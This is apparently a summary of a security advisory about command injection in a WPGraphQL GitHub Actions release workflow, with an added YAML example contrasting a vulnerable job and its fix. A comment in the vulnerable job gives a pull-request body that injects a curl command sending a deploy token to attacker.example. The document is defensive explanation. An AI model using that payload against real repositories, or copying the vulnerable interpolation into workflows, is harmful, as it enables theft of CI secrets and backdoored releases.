Key Information from the Screenshot

Severity
Severity: 7.7/10 (High)

Affected Package and Versions
Package:
Affected versions: <= 2.7.0
Patched versions: None

Vulnerability Details
Description: The repository contains a GitHub Actions workflow ( ) that is vulnerable to OS command injection through unsanitized GitHub Actions expressions. The weakness lies in the repository's CI workflow, not in the shipped plugin, so users do not need to update WPGraphQL or its extensions.

Summary: The step in that generates release notes interpolates directly inside a shell block. The expression is expanded as text before the shell parses the script, so attacker-controlled content becomes part of the command line and is executed when a pull request from to is merged.

Exploitation
PoC: A pull request body crafted to contain a shell command (for example, one that sends the secret to an attacker-controlled host) exfiltrates that secret when the workflow runs.

Impacts
Secrets at risk: , ,
Supply chain impact: Compromise of these secrets could allow an attacker to publish a backdoored release, affecting thousands of WordPress installations.

Recommended Fix
Move all expressions from blocks to blocks, so that the untrusted value reaches the shell only as data the script quotes, rather than as script text. An example change to the workflow was provided.

References
Links to related security advisories and similar vulnerabilities in other projects.
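The following workflow is an added illustration of the injection pattern and the fix described in the Summary and Recommended Fix sections above; it is not the repository's own workflow and not the advisory's example. The workflow name, job names, file name, and the secret name DEPLOY_TOKEN are placeholders, and the mitigation shown (evaluating the expression into an intermediate environment variable) is the one GitHub's own hardening guidance documents for untrusted event data.

```yaml
# Added illustration, not the project's workflow. Names and secrets are placeholders.
name: release-notes
on:
  pull_request:
    types: [closed]

jobs:
  # VULNERABLE: ${{ ... }} is substituted into the script text before the shell
  # parses it. A PR body such as
  #   "; curl -d "$DEPLOY_TOKEN" https://attacker.example/ ; echo "
  # closes the quote and runs arbitrary commands with the job's secrets.
  notes-vulnerable:
    if: github.event.pull_request.merged == true
    runs-on: ubuntu-latest
    env:
      DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}   # placeholder secret
    steps:
      - run: |
          echo "## Release notes" >> notes.md
          echo "${{ github.event.pull_request.body }}" >> notes.md

  # FIXED: the expression is evaluated into a step-level environment variable.
  # The shell only ever sees "$PR_BODY", which is expanded as data; quotes,
  # semicolons, backticks or $(...) inside the value are never re-parsed.
  notes-fixed:
    if: github.event.pull_request.merged == true
    runs-on: ubuntu-latest
    env:
      DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}   # placeholder secret
    steps:
      - env:
          PR_BODY: ${{ github.event.pull_request.body }}
        run: |
          echo "## Release notes" >> notes.md
          printf '%s\n' "$PR_BODY" >> notes.md
```

Two caveats when applying the fix: the variable must stay double-quoted inside the script (an unquoted $PR_BODY is no longer command injection, but it is still subject to word splitting and glob expansion), and the same rule applies to every other attacker-influenced field, such as the PR title, branch name, commit message, or issue body. A quick audit of a repository is to search the workflow directory for `${{` occurrences that sit inside `run:` blocks, for example with `grep -n '\${{' .github/workflows/*.yml`, and to move each one into an `env:` entry.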